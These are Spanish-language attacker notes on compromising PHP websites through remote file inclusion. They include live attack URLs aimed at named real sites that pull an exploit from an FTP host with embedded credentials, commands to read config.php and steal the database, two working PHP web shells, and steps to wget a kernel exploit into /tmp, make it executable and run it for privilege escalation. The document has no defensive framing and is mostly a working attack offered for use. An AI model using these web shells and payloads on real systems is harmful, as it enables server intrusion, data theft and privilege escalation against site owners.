Elementos a usar:
http://www.karass.nu/htmltonuke.php?filnavn=ftp://mygaropa_garopa:lololo@mygaropa.awardspace.us/mygaropa.awardspace.us/exploit.htm&cmd=ls
Listo archivos con el ls del cmd.
http://www.karass.nu/htmltonuke.php?filnavn=ftp://mygaropa_garopa:lololo@mygaropa.awardspace.us/mygaropa.awardspace.us/exploit.htm&cmd=cat%20config.php
Veo el config.php para robar la bdd.
Uso el mysql_Front para robar la base.

Se obtiene tener codigo php ingresando en al web
se pone un exploit php que responda al shell (cmd)
se obitene la version del kernel atraves de la cmd
se obtiene un epxloit del kernel que se puede ser para escalar privilegios
o para buffer overflow y derivados


Codigo que permite ejecutar comandos shell
<?
exec($_GET[cmd],$exit);
foreach($exit as $line) { echo "$line<br>"; }
?>


web:
http://www.indaya.com/modules/tinycontent/index.php?id=27

metodo 1


<? 
echo "<html>"; 
$lacadena=$_GET['elcomando']; 
$lacadena=`$lacadena`; 
echo $lacadena; 
?> 
<br><br> 
<form ACTION=xcosa.php> 
<INPUT TYPE="TEXT" NAME="elcomando" size="1000"> 
<INPUT TYPE="SUBMIT" NAME="variable" value="Ejecutalo"> 
</form>
?>


metodo 2

<?
exec($_GET[cmd],$exit);
foreach($exit as $line) { echo "$line<br>"; }
?>


Vamos a decir que la dirección donde tenemos el exploit es http://localhost/xploit.gif

lo siguiente será ver si la víctima ejecuta el código vulnerable en su site, si es así entonces lo llamaremos de la siguiente forma

http://victima.org/pagina_vulnerable.php?page=http://localhost/xploit.gif

Como se puede ver, ya incluimos en esa dirección el exploit que tenemos en muestro site así que le daremos el comando para que ejecute un terminal

http://victima.org/pagina_vulnerable.php?page=http://localhost/xploit.gif?cmd=(comando)


Manipular

cd /tmp
wget http://localhost/w00t

Una vez allí el exploit le cambiamos los permisos de ejecución:

chmod 777 w00t

Y lo ejecutamos:

./w00t